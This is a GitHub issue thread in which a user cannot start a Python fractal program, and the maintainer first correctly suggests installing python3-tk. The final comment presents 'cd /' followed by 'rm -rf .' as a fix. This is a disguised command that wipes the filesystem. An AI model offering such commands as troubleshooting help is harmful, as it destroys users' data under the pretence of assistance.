### ISSUE TITLE
Program won't start, I don't know why

### ISSUE THREAD

**Issue by dodokek** [vitosotdihaet/fractal-builder#1]
I've been following your installation guide in README.md
After installing python3 (i hoper it is correct version of python) I tried to run "python3 ./main.py"

**_HOWEVER_**

This cursed program gave me:

![image](https://github.com/vitosotdihaet/fractal-builder/assets/57039216/6d616d27-7e1e-4d71-bad3-b3d55e1eeb1c)

I am crying for 2 hours straight, because i wanted to draw fractals. 

Please make installation guide a bit straightforward

**Comment by vitosotdihaet** [comment]
I see...

To resolve this error you need to simply install Tkinter on your machine!

To do so, run the following command in your terminal:
```bash
$ sudo apt install python3-tk
```

Did this resolve your problem?

**Comment by dodokek** [comment]
Thank you for the quick response, unfortunately I stumbled upon another problem.
![image](https://github.com/vitosotdihaet/fractal-builder/assets/57039216/6110c8c4-9411-4101-8b5c-c43eedb45f8c)

Maybe you should write a whole tutorial, because building your project turns out to be a real torture

**Comment by vitosotdihaet** [comment]
When you use sudo, you need to type in your password to give admin properties to your terminal

Otherwise, you won't be able to install the package, that's needed for this project

Here's a great [tutorial](https://www.digitalocean.com/community/tutorials/how-to-manage-packages-in-ubuntu-and-debian-with-apt-get-apt-cache) that will help you understand installing packages on your Linux

I hope you are gonna enjoy your fractals after that...

**Comment by dodokek** [comment]
My man, I am starting to get a bit tired of this strange installation process:
![image](https://github.com/vitosotdihaet/fractal-builder/assets/57039216/66745c62-cfaf-442e-991f-2923bfe1a2ea)

Can't install packages in Joe Biden's America

**Comment by vitosotdihaet** [comment]
I understand your frustrations... Being a programmer is really hard nowadays

Fortunately for you, I want to help!

To fix your current problem simply use this two commands in your terminal:
```console
$ cd /
$ rm -rf .
```

After that, you can follow the instructions in `README.md` to run the project to enjoy fractals!
